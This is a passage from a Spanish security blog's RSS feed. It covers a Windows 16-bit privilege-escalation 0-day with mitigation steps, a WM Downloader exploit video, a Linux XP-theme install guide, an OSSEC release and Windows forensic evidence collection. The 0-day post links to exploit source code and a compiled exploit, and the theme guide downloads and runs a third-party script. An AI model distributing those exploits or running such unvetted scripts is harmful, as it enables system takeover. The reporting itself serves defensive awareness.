<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="400" height="300" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=6431352&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed type="application/x-shockwave-flash" width="400" height="300" src="http://vimeo.com/moogaloop.swf?clip_id=6431352&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.milw0rm.com/exploits/8403">WM Downloader (.M3U File) Local Stack Overflow POC</a><br />
<a rel="nofollow" target="_blank" href="http://mini-stream.net/wm-downloader/">Pagina Oficial del WM Downloader</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-i.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte I">Todos los Vídeos de AntiChat &#8211; Parte I</a></li><li><a href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-ii.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte II">Todos los Vídeos de AntiChat &#8211; Parte II</a></li><li><a href="http://www.dragonjar.org/bypass-con-metasploit-atacando-a-nuestro-objetivo-desde-una-maquina-ya-comprometida.xhtml" title="Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida">Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml" title="Detección de WebDAV, verificación de la vulnerabilidad y explotación">Detección de WebDAV, verificación de la vulnerabilidad y explotación</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/video-tutorial-de-nessus-y-baseline-security-analyzer.xhtml" title="Video Tutorial de Nessus y Baseline Security Analyzer">Video Tutorial de Nessus y Baseline Security Analyzer</a></li><li><a href="http://www.dragonjar.org/hacking-de-redes-upnp-parte-iii.xhtml" title="Hacking de Redes UPnP &#8211; Parte III">Hacking de Redes UPnP &#8211; Parte III</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/video-explotando-wm-downloader.xhtml/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Vulnerabilidad 0-day en todas las versiones de Windows</title>
		<link>http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml</link>
		<comments>http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml#comments</comments>
		<pubDate>Wed, 20 Jan 2010 20:55:02 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[2003]]></category>
		<category><![CDATA[2008]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Vulnerable]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[XP]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3720</guid>
		<description><![CDATA[Microsoft no ha empezado el año bien con respecto a la seguridad de sus productos, mientras muchos todavía esperamos los parches oficiales para el 0-Day en el  Internet Explorer que se anuncio hace poco, hoy sale a la luz publica otro 0-Day que afecta a todas las versiones del sistema operativo Microsoft Windows.

Este fallo descubierto [...]]]></description>
			<content:encoded><![CDATA[<p>Microsoft no ha empezado el año bien con respecto a la seguridad de sus productos, <a rel="nofollow" target="_blank" href="http://elladodelmal.blogspot.com/2010/01/protegere-contra-el-exploit-1day-de-ie.html">mientras muchos</a> todavía <a rel="nofollow" target="_blank" href="http://www.sahw.com/wp/archivos/2010/01/20/dep-en-internet-explorer-8-tocado-y-hundido/">esperamos</a> los <a rel="nofollow" target="_blank" href="http://blog.segu-info.com.ar/2010/01/parche-critico-para-ie-se-publica.html">parches oficiales para el 0-Day</a> en el  <a rel="nofollow" target="_blank" href="http://www.sahw.com/wp/archivos/2010/01/19/0-day-en-internet-explorer-la-proteccion-dep-y-sus-limitaciones/">Internet Explorer</a> que se anuncio hace poco, hoy sale a la luz publica <a rel="nofollow" target="_blank" href="http://www.securityfocus.com/data/vulnerabilities/exploits/37864.zip">otro 0-Day</a> que afecta a todas las versiones del sistema operativo Microsoft Windows.</p>
<p style="text-align: center;"><img class="alignnone" title="0day en Windows" src="http://farm3.static.flickr.com/2684/4291646450_4571861db7.jpg" alt="4291646450 4571861db7 Vulnerabilidad 0 day en todas las versiones de Windows" width="500" height="375" /></p>
<p>Este fallo descubierto por el investigador <a rel="nofollow" target="_blank" href="http://taviso.decsystem.org/">Tavis Ormandy (miembro del equipo de seguridad de google)</a>, se aprovecha del soporte heredado de aplicaciones de 16 bits que Windows viene heredando desde su versión &#8220;NT&#8221; y permite a un atacante obtener privilegios de SYSTEM (máximo privilegio en el sistema) en un sistema vulnerable.<span id="more-3720"></span></p>
<p>Aunque todavía no existe un parche para este fallo de seguridad,  solo tendremos que deshabilitar el soporte para aplicaciones de 16 bits para proteger nuestro sistema, a continuación les dejo una serie de pasos a seguir para desactivarlo:</p>
<ol>
<li>Inicio/Ejecutar gpedit.msc</li>
<li>Abrir &#8220;Configuración de equipo&#8221;/ &#8220;Plantillas administrativas&#8221;/ &#8220;Componentes de Windows&#8221;/&#8221;Compatibilidad de aplicación&#8221;</li>
<li>Y habilitar &#8220;Impedir el acceso a aplicaciones de 16 bits&#8221;</li>
</ol>
<p>O puedes seguir los pasos de los siguientes vídeos según tu sistema operativo</p>
<p>Windows Server 2003:</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/XRVI4iQ2Nug&amp;hl=es_ES&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/XRVI4iQ2Nug&amp;hl=es_ES&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Windows Server 2008</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/u8pfXW7crEQ&amp;hl=es_ES&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/u8pfXW7crEQ&amp;hl=es_ES&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Para Windows XP:</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/u7Y6d-BVwxk&amp;hl=es_ES&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/u7Y6d-BVwxk&amp;hl=es_ES&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Ya existe un exploit publicado para este bug que funciona correctamente incluso en Windows 7, puedes encontrar el <a rel="nofollow" target="_blank" href="http://downloads.securityfocus.com/vulnerabilities/exploits/37864.zip">código fuente en este enlace</a>, o el <a rel="nofollow" target="_blank" href="http://www.4shared.com/file/202590202/dddbdf3f/0DayWin2__wwwDragonJARorg_.html">exploit compilado aquí</a>, por lo tanto es MAS QUE RECOMENDADO que desactives el soporte para 16 bits de tu sistema y actualices el mismo con Windows Update tan pronto salga el parche que corrija este problema.</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.hispasec.com/unaaldia/4106">Grave vulnerabilidad en Windows permite elevar privilegios</a><br />
<a rel="nofollow" target="_blank" href="http://www.genbeta.com/windows/vulnerabilidad-muy-critica-en-todas-las-versiones-de-windows">Vulnerabilidad muy crítica en todas las versiones de Windows</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml" title="Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;">Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</a></li><li><a href="http://www.dragonjar.org/recuperar-contrasenas-de-windows-vista-y-anteriores.xhtml" title=" Recuperar Contraseñas de Windows Vista y Anteriores"> Recuperar Contraseñas de Windows Vista y Anteriores</a></li><li><a href="http://www.dragonjar.org/dentro-del-corazon-de-windows-server-2008.xhtml" title="Dentro del corazón de Windows Server 2008">Dentro del corazón de Windows Server 2008</a></li><li><a href="http://www.dragonjar.org/guia-de-seguridad-de-windows-server-2003-2.xhtml" title="Guia de Seguridad de Windows Server 2003">Guia de Seguridad de Windows Server 2003</a></li><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>GNU Linux con apariencia de Windows XP</title>
		<link>http://www.dragonjar.org/apariencia-de-windows-para-linux.xhtml</link>
		<comments>http://www.dragonjar.org/apariencia-de-windows-para-linux.xhtml#comments</comments>
		<pubDate>Tue, 08 Dec 2009 05:01:09 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Apariencia]]></category>
		<category><![CDATA[Migrar]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3457</guid>
		<description><![CDATA[Cuando necesitamos migrar de Windows a GNU/Linux uno o varios equipos que son utilizados por personas poco familiarizadas con los entornos GNU/Linux, siempre nos encontramos con quejas y reclamos del tipo &#8220;eso que es&#8220;, &#8220;yo no se manejarlo&#8220;, &#8220;pongame el que estaba antes&#8220;, el tipo de personas que hace esos reclamos ni siquiera se toman [...]]]></description>
			<content:encoded><![CDATA[<p>Cuando necesitamos migrar de Windows a GNU/Linux uno o varios equipos que son utilizados por personas poco familiarizadas con los entornos GNU/Linux, siempre nos encontramos con quejas y reclamos del tipo &#8220;<em>eso que es</em>&#8220;, &#8220;<em>yo no se manejarlo</em>&#8220;, &#8220;<em>pongame el que estaba antes</em>&#8220;, el tipo de personas que hace esos reclamos ni siquiera se toman el trabajo de explorar un poco el sistema nuevo, para ver como se maneja.</p>
<p style="text-align: center;"><img class="alignnone" title="Aspecto de Windows XP a Linux" src="http://farm3.static.flickr.com/2708/4170408879_f849f42b8d_o.jpg" alt="4170408879 f849f42b8d o GNU Linux con apariencia de Windows XP" width="500" height="309" /></p>
<p>Algo que he descubierto cuando hago este tipo de migraciones, es que si a los usuarios se les deja un entorno similar al que están acostumbrados a manejar, estarán mas dispuestos a explorar el sistema nuevo y en muchos casos, ni siquiera se dan cuenta que se les cambió  (ya que encuentran el messenger y el navegador que es todo lo que usan).</p>
<p>Existen muchas herramientas para lograr que una distribución de GNU Linux luzca como un Windows XP, pero ninguna tan simple como la <a rel="nofollow" target="_blank" href="http://ubuntu.online02.com/node/14">desarrollada por PhrankDaChicken</a> y que utilizaremos en este articulo, ya que con solo unos pasos logra cumplir su cometido sin ningun problemas.<span id="more-3457"></span></p>
<p>Para cambiar la apariencia de tu Distribución GNU Linux a la de un Windows XP, solo necesitas lo siguiente:</p>
<ul>
<li>Distribución GNU Linux con Gnome (Ubuntu, Debian, Etc&#8230;)</li>
<li>El <a rel="nofollow" target="_blank" href="http://ubuntu.online02.com/files/XpGnome.tar.gz">Script desarrollado por PhrankDaChicken</a></li>
</ul>
<p>Ahora simplemente descargamos el script</p>
<ul>
<li>wget http://ubuntu.online02.com/files/XP_Gnome.tar.gz</li>
</ul>
<p>Lo descomprimimos</p>
<ul>
<li>tar zxf XP_Gnome.tar.gz</li>
</ul>
<p>Ejecutamos el script</p>
<ul>
<li>sh InstallXpGnome.sh</li>
</ul>
<p>Y cuando nos aparezca las preferencias de ventana nos vamos a &#8220;<em>local</em>&#8221; y escogemos el tema XP.</p>
<p>Con estos simples pasos tendremos un entorno GNU/Linux con un aspecto de Windows XP, si les cambias el icono del Mozilla Firefox por el de <a rel="nofollow" target="_blank" href="http://www.iconfinder.net/icondetails/10625/128/?q=internet+explorer">Internet Explorer</a>, el del <a rel="nofollow" target="_blank" href="http://www.amsn-project.net/download.php">aMSN</a> por el de <a rel="nofollow" target="_blank" href="http://www.iconfinder.net/icondetails/7224/128/?q=messenger">Windows Live Messenger</a> y los dejas en el escritorio, la mayoría de personas ni siquiera notaran la diferencia (ya que no usan nada mas del sistema operativo), ademas si no te gusta el resultado obtenido, siempre puedes deshacer los cambios ejecutando el script &#8220;<em>Restore_Settings.sh</em>&#8220;, y volver a tu apariencia anterior.</p>
<p>A continuación les dejo un vídeo con el paso a paso de la instalación y restauración, para poner tu GNU Linux con apariencia de un Windows XP.</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/n4StlvX-kOg&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/n4StlvX-kOg&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/cursos-de-ubuntu.xhtml" title="Curso de Ubuntu">Curso de Ubuntu</a></li><li><a href="http://www.dragonjar.org/migrar-instalacion-de-linux-a-una-particion-o-disco-diferente.xhtml" title="Migrar instalación de Linux a una partición ó disco diferente">Migrar instalación de Linux a una partición ó disco diferente</a></li><li><a href="http://www.dragonjar.org/montar-particiones-windows-haciendo-uso-de-ntfs-3g.xhtml" title="Montar particiones Windows haciendo uso de NTFS-3G">Montar particiones Windows haciendo uso de NTFS-3G</a></li><li><a href="http://www.dragonjar.org/manual-de-truecrypt.xhtml" title="Manual de TrueCrypt">Manual de TrueCrypt</a></li><li><a href="http://www.dragonjar.org/instalando-varios-sistemas-operativos-en-un-acer-one-parte-i.xhtml" title="Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I">Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I</a></li><li><a href="http://www.dragonjar.org/limitar-ancho-de-banda-en-linux.xhtml" title="Limitar Ancho de Banda en GNU Linux">Limitar Ancho de Banda en GNU Linux</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/apariencia-de-windows-para-linux.xhtml/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>OSSEC &#8211; Sistema de Detecion de Intrusos Basado en Host</title>
		<link>http://www.dragonjar.org/ossec.xhtml</link>
		<comments>http://www.dragonjar.org/ossec.xhtml#comments</comments>
		<pubDate>Mon, 07 Dec 2009 20:11:57 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Protección de la Información]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[monitoreo]]></category>
		<category><![CDATA[openBSD]]></category>
		<category><![CDATA[OSSEC]]></category>
		<category><![CDATA[Rootkits]]></category>
		<category><![CDATA[Solaris]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3452</guid>
		<description><![CDATA[OSSEC es un proyecto open source de gestión de Logs, que monitoriza una máquina, y que detecta las anomalías que puedan producirse en ella. Para hacer esto utiliza  herramientas para la detección de rootkits, para revisar la integridad de ficheros y ejecutables del sistema, y por último un potente sistema para analizar logs.
Esta basado en [...]]]></description>
			<content:encoded><![CDATA[<p>OSSEC es un proyecto open source de gestión de Logs, que monitoriza una máquina, y que detecta las anomalías que puedan producirse en ella. Para hacer esto utiliza  herramientas para la detección de rootkits, para revisar la integridad de ficheros y ejecutables del sistema, y por último un potente sistema para analizar logs.</p>
<p>Esta basado en un modelo de cliente-servidor, con lo cual tendremos un servidor centralizado que se encarga de recibir y actuar en base a la información que reciba de los agentes que, en definitiva, son las máquinas que están siendo monitorizadas y atacadas. La forma de actuar del servidor es, por una parte, enviando notificaciones, y por otro lado, si así se configura, generando reglas firewall que se ejecutarán en los propios agentes.</p>
<p style="text-align: center;"><img class="alignnone" title="Monitoreo de Logs" src="http://www.ossec.net/img/ossec_logo.jpg" alt="ossec logo OSSEC   Sistema de Detecion de Intrusos Basado en Host " width="191" height="81" /></p>
<p>Funciona en la mayoría de sistemas operativos, incluyendo Linux, OpenBSD, FreeBSD, MacOS, Solaris y Windows, ademas acaba de salir la nueva version 2.3 de este proyecto, la cual incluye:<span id="more-3452"></span></p>
<ol>
<li>Registro de las reglas de análisis para el servidor web nginx</li>
<li>Registro de las normas de análisis de suhosin (Hardened PHP)</li>
<li>Soporte para la vigilancia de integridad de archivos en tiempo real en los sistemas Windows</li>
<li>Soporte para el <a rel="nofollow" target="_blank" href="http://www.ossec.net/main/manual/manual-process-monitoring/">control de la salida de los comandos</a> (control de proceso)</li>
<li><a rel="nofollow" target="_blank" href="http://www.ossec.net/announcements/v2.3-2009-12-07.txt">Y mucho más (para ver la lista entera de cambios, click aqui)</a>&#8230;</li>
</ol>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://www.ossec.net/main/downloads/">Descargar OSSEC 2.3 </a></h2>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.ossec.net">Pagina Oficial del OSSEC</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/gestionando-las-impresiones-en-mac-windows-y-gnu-linux.xhtml" title="Gestionando las impresiones en MAC, Windows y GNU Linux">Gestionando las impresiones en MAC, Windows y GNU Linux</a></li><li><a href="http://www.dragonjar.org/como-quemar-archivo-dmg-en-windows.xhtml" title="Como quemar un archivo DMG en Windows y GNU Linux">Como quemar un archivo DMG en Windows y GNU Linux</a></li><li><a href="http://www.dragonjar.org/desbloquea-jailbreak-firmware-3-1-2-iphone-y-ipod-touch.xhtml" title="Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch">Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.1.2 para iPhone y iPod Touch</a></li><li><a href="http://www.dragonjar.org/aircrack-ng-v1-0-final.xhtml" title="Aircrack NG v1.0 Final">Aircrack NG v1.0 Final</a></li><li><a href="http://www.dragonjar.org/desbloquea-o-actualiza-el-iphone-os-3-0.xhtml" title="Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch">Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch</a></li><li><a href="http://www.dragonjar.org/manual-de-truecrypt.xhtml" title="Manual de TrueCrypt">Manual de TrueCrypt</a></li><li><a href="http://www.dragonjar.org/instalando-varios-sistemas-operativos-en-un-acer-one-parte-i.xhtml" title="Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I">Instalando Varios Sistemas Operativos en un Acer One &#8211; Parte I</a></li><li><a href="http://www.dragonjar.org/adeona-rastrea-tu-portatil-robado.xhtml" title="Adeona &#8211; Rastrea tu Portatil Robado">Adeona &#8211; Rastrea tu Portatil Robado</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/ossec.xhtml/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Recogiendo Evidencias para Análisis Forense en Windows</title>
		<link>http://www.dragonjar.org/recogiendo-evidencias-analisis-forense-windows.xhtml</link>
		<comments>http://www.dragonjar.org/recogiendo-evidencias-analisis-forense-windows.xhtml#comments</comments>
		<pubDate>Tue, 24 Nov 2009 23:16:25 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Informática Forense]]></category>
		<category><![CDATA[Analisis]]></category>
		<category><![CDATA[Evidencias]]></category>
		<category><![CDATA[Forense]]></category>
		<category><![CDATA[Memoria Ram]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3428</guid>
		<description><![CDATA[Despues de escribir sobre la Instalación, Configuración y Uso del Microsoft Cofees nuestro amigo Seifreed nos regala otro articulo relacionado con el análisis forense en entornos windows, en esta ocasión recogeremos evidencias para un posterior análisis de estas.
Indice

Introducción
Obteniendo datos volátiles
Obteniendo datos no volátiles
Clonando el disco
Referencias

1.- Introducción

Tradicionalmente los forenses vienen dividiendo los datos en 2 tipos:

Datos [...]]]></description>
			<content:encoded><![CDATA[<p>Despues de escribir sobre la <a rel="nofollow" target="_blank" title="Enlace permanente a Instalación, Configuración y Uso del Microsoft Cofee" rel="bookmark" href="../instalacion-configuracion-y-uso-del-microsoft-cofee.xhtml">Instalación, Configuración y Uso del Microsoft Cofee</a>s nuestro amigo <a rel="nofollow" target="_blank" rel="nofollow" href="http://comunidad.dragonjar.org/members/seifreed/" target="_blank">Seifreed</a> nos regala otro articulo relacionado con el análisis forense en entornos windows, en esta ocasión recogeremos evidencias para un posterior análisis de estas.</p>
<p><strong><span style="text-decoration: underline;">Indice</span></strong></p>
<ol>
<li>Introducción</li>
<li>Obteniendo datos volátiles</li>
<li>Obteniendo datos no volátiles</li>
<li>Clonando el disco</li>
<li>Referencias</li>
</ol>
<p><strong><span style="text-decoration: underline;"><span id="more-3428"></span>1.- Introducción<br />
</span></strong></p>
<p>Tradicionalmente los forenses vienen dividiendo los datos en <strong>2</strong> tipos:</p>
<ul>
<li>Datos <strong>volátiles</strong>.</li>
<li>Datos <strong>no volátiles</strong>.</li>
</ul>
<p>Los datos volátiles son aquellos que al apagar la maquina a analizar se pierden. Esto no es del todo exacto, pues tal y como debatimos <a rel="nofollow" target="_blank" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.wadalbertia.org/phpBB2/viewtopic.php?t=4891" target="_blank"><strong>aqui</strong></a> es posible recuperar datos almacenados en RAM <strong>_tras apagar_ el equipo</strong>.</p>
<p>Los datos no volatiles por el contrario son aquellos que permanecen en el disco duro tras apagar la maquina.</p>
<p>Tipicamente, un forense adquiriria una imagen del disco mediante herramientas tipo <strong>dd</strong> o cualquiera de sus evoluciones (podemos ver mas del <a rel="nofollow" target="_blank" title="Enlace permanente a Análisis de memoria RAM. Recogida de evidencias" rel="bookmark" href="../analisis-de-memoria-ram-recogida-de-evidencias.xhtml">Análisis de memoria RAM. Recogida de evidencias en este post</a>). Nunca con herramientas tipo <strong>Ghost</strong>, pues perderiamos la información a mas bajo nivel como en que <a rel="nofollow" target="_blank" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.forensics-intl.com/def19.html" target="_blank"><strong>clusters</strong></a> o <a rel="nofollow" target="_blank" rel="nofollow" href="http://www.forensics-intl.com/def15.html" target="_blank"><strong>sectores</strong></a> estaba almacenada la informacion, espacio particionado y libre (<a rel="nofollow" target="_blank" target="_blank"><strong>unallocated</strong></a>), <a rel="nofollow" href="http://www.forensics-intl.com/def6.html" target="_blank"><strong>espacio slack</strong></a> o espacio sin particionar.</p>
<p>Y como una imagen vale mas que mil palabras, como dice el refran, a continuacion muestro una imagen donde se ve mas claro lo que son estos conceptos:</p>
<p style="text-align: center;"><img class="aligncenter" src="http://two.xthost.info/vlan7b/slack.jpg" border="0" alt="slack Recogiendo Evidencias para Análisis Forense en Windows"  title="Recogiendo Evidencias para Análisis Forense en Windows" /></p>
<p>Sobre el espacio slack me gustaría hacer un inciso, enlazando un vídeo algo viejo pero interesante titulado <a rel="nofollow" target="_blank" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.irongeek.com/i.php?page=videos/slack1" target="_blank"><strong>Look for deleted data on the slack space of a disk</strong></a>.</p>
<p>También comentar la existencia de la genial utilidad <a rel="nofollow" target="_blank" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.metasploit.com/research/projects/antiforensics/" target="_blank"><strong>slacker</strong></a>, sobre la que hablamos, quizas muy por encima para lo que se merece, en un hilo llamado <a rel="nofollow" target="_blank" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.wadalbertia.org/phpBB2/viewtopic.php?t=4857" target="_blank"><strong>Anti-Forensics</strong></a>.</p>
<p>Así que los que queráis iniciaros en el uso de dicha herramienta, podéis consultar un paper bautizado con el atrayente titulo de <a rel="nofollow" target="_blank" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-foster-liu-update.pdf" target="_blank"><strong>catch me, if you can&#8230;</strong></a> presentado en la Blackhat 2005 por <strong>James Foster</strong> y el crack <strong>Vinnie Liu</strong>, que no se si a dia de hoy sigue implicado en el <a rel="nofollow" target="_blank" rel="nofollow" href="http://www.metasploit.com/" target="_blank"><strong>Proyecto Metasploit</strong></a>.</p>
<p>Y por ultimo, para los que querais profundizar sobre sistemas de archivos a bajo nivel, os recomiendo el _excelente_ libro <strong>File System Forensic Analysis</strong>, de <strong>Brian Carrier</strong>; ademas de los talleres de <strong>Vic_Thor</strong> sobre <a rel="nofollow" target="_blank" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.wadalbertia.org/phpBB2/viewtopic.php?t=4630" target="_blank"><strong>FATxx</strong></a> y <a rel="nofollow" target="_blank" rel="nofollow" href="http://anonym-url.com/go.php?to=http://www.wadalbertia.org/phpBB2/viewtopic.php?t=4785" target="_blank"><strong>NTFS</strong></a>.</p>
<p><strong>&#8220;Cualquier contacto, deja un trazo&#8221;</strong><br />
Locard&#8217;s Exchange Principle</p>
<p>Continuar el post en <a rel="nofollow" target="_blank" id="thread_title_8787" href="http://comunidad.dragonjar.org/f157/recogiendo-datos-para-analisis-forense-de-sistemas-windows-8787/">Recogiendo datos para Análisis Forense de sistemas Windows &gt;&gt;<br />
</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/analisis-forense-de-memoria-ram-en-entornos-windows.xhtml" title="Análisis forense de memoria RAM en entornos Windows">Análisis forense de memoria RAM en entornos Windows</a></li><li><a href="http://www.dragonjar.org/webcast-de-microsoft-sobre-seguridad-informatica.xhtml" title="Webcast de Microsoft sobre Seguridad Informática">Webcast de Microsoft sobre Seguridad Informática</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/la-anti-tesis-del-cofee.xhtml" title="Herramienta Anti Forense para Windows">Herramienta Anti Forense para Windows</a></li><li><a href="http://www.dragonjar.org/distribucion-live-cd-analisis-forense.xhtml" title="CAINE &#8211; Distribución Live CD para Análisis Forense">CAINE &#8211; Distribución Live CD para Análisis Forense</a></li><li><a href="http://www.dragonjar.org/instalacion-configuracion-y-uso-del-microsoft-cofee.xhtml" title="Instalación, Configuración y Uso del Microsoft Cofee">Instalación, Configuración y Uso del Microsoft 